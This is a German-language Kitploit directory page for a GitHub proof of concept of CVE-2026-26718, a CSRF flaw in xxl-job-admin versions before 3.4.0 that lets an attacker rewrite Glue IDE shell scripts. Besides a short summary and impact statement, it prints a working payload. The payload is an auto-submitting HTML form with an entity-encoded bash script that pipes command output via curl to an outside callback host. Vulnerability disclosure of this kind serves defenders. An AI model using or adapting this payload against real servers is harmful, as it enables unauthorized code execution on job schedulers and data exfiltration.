Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2026-26718 — Eine Cross-Site Request Forgery (CSRF)-Schwachstelle existiert in der xxl-job-admin-Webanwendung, die es einem Angreifer ermöglicht, unbefugte Änderungen an Glue-IDE-Shell-Skripten vorzunehmen. Der betroffene Endpunkt fehlt eine ordnungsgemäße CSRF-Token-Validierung und akzeptiert beliebige HTTP-Methoden über ein permissives Request-Mapping | Kitploit
Tools/GitHubGitHub/ibrahim-sartawi/cve-2026-26718
SchwachstellenanalyseExploitationIDS/IPS-UmgehungWebanwendungs-ExploitationWebsicherheitPenetrationstests
GitHubibrahim-sartawi/cve-2026-26718

CVE-2026-26718

Repository anzeigen
13vor 1 MonatNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →

Über

Eine Cross-Site Request Forgery (CSRF)-Schwachstelle existiert in der xxl-job-admin-Webanwendung, die es einem Angreifer ermöglicht, unbefugte Änderungen an Glue-IDE-Shell-Skripten vorzunehmen. Der betroffene Endpunkt fehlt eine ordnungsgemäße CSRF-Token-Validierung und akzeptiert beliebige HTTP-Methoden über ein permissives Request-Mapping

Teilen

Beschreibung

Zusammenfassung

Eine Cross-Site-Request-Forgery (CSRF)-Sicherheitslücke besteht in der xxl-job-admin Webanwendung, die es einem Angreifer ermöglicht, unbefugte Änderungen an Glue-IDE-Shell-Skripten vorzunehmen. Der betroffene Endpunkt fehlt eine ordnungsgemäße CSRF-Token-Validierung und akzeptiert beliebige HTTP-Methoden über eine zu freizügige Request-Mapping-Konfiguration.

Betroffene Produkte

root@kitploit:~
xxl-job < 3.4.0

Auswirkung

Ein Angreifer kann einen authentifizierten Administrator dazu verleiten, unbefugte Änderungen an Glue-IDE-Shell-Skripten vorzunehmen.

Proof of Concept

Folie1 Folie2 Folie3 Folie4

Payload

root@kitploit:~

// Decode and change it 

<html>
  <body>
    <form action="https://domain.com/jobcode/save">
      <input type="hidden" name="id" value="294" />
      <input type="hidden" name="glueSource" value="&#35;&#33;&#47;bin&#47;bash&#10;id&#32;&#124;&#32;curl&#32;&#45;d&#32;&#64;&#45;&#32;http&#58;&#47;&#47;qic8br6d6om2j459zk4evuimldr4f03p&#46;oastify&#46;com&#32;&#10;exit&#32;0&#10;" />
      <input type="hidden" name="glueRemark" value="12345" />
      <input type="submit" value="Submit request" />
    </form>
    <script>
      history.pushState('', '', '/');
      document.forms[0].submit();
    </script>
  </body>
</html>

Dank an Ibrahim Sartawi

Tool herunterladen